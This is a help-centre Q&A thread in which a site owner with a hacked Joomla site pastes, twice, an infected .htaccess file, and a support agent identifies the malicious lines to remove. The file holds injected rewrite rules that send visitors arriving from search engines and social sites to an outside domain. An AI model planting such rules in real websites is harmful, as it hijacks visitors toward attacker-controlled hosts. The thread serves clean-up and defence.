Community Q&A:
hacked joomla website
'Hi
Please i need your help my website has been hacked as per webmaster tools at google i have been told to check my htaccess file to see if there is any redirect there is but i am a newbe to webdesign and i need help i have a copy of the htaccess file information and i would like you to advice me as what must i delete
Thanks
Ismail
My website is www.islamicmessages.co.za
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://quavtrest.ru/space?7 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://quavtrest.ru/space?7 [R=301,L]
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
order deny,allow
deny from all
allow from all
order deny,allow
deny from all
AuthName islamicmessages.co.za
AuthUserFile /home/islamicm/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/islamicm/public_html/_vti_pvt/service.grp
Please i need your help my website has been hacked as per webmaster tools at google i have been told to check my htaccess file to see if there is any redirect there is but i am a newbe to webdesign and i need help i have a copy of the htaccess file information and i would like you to advice me as what must i delete
Thanks
Ismail
My website is www.islamicmessages.co.za
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://quavtrest.ru/space?7 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://quavtrest.ru/space?7 [R=301,L]
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
order deny,allow
deny from all
allow from all
order deny,allow
deny from all
AuthName islamicmessages.co.za
AuthUserFile /home/islamicm/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/islamicm/public_html/_vti_pvt/service.grp
Best answer chosen by User
|
0
|
Hello hismail, I'm sorry your Joomla site has been hacked. While checking into this for you, I see that the domain listed is not hosted with us, so we would not be able to view the actual .htaccess file. If you do not have a clean back up of your site which you can restore from, I would recommend removing the block of code that starts with the line: ^.*(google|ask|yahoo|baidu.... and ends with the line: RewriteRule ^(.*)$ http://quavtrest.ru/space?7 [R=301,L] Those appear to be the lines causing the redirect. Certain hacks will also continue to rewrite your .htaccess file, so you will want to check for those files in your hosting account: Cleaning up Joomla Conditional Hacks Please note, if you are running Joomla 1.5, there are a number of security issues with that version and you should upgrade your site as soon as you have cleaned up the hacked code. For more information on Joomla security, please see: Joomla Security Checklist How Joomla sites are hacked We also have additional information about hacks and steps to take to help prevent future attacks: What do I do if my Website is Hacked? Steps to Take if Your Website is Hacked Please let us know if you have any questions. Regards, Christi N. |
Want to share this Question?
Tweet
Help Center Login
Related Articles
It looks like there are no related articles.
Would you like to ask a question about this page? If so, click the button below!
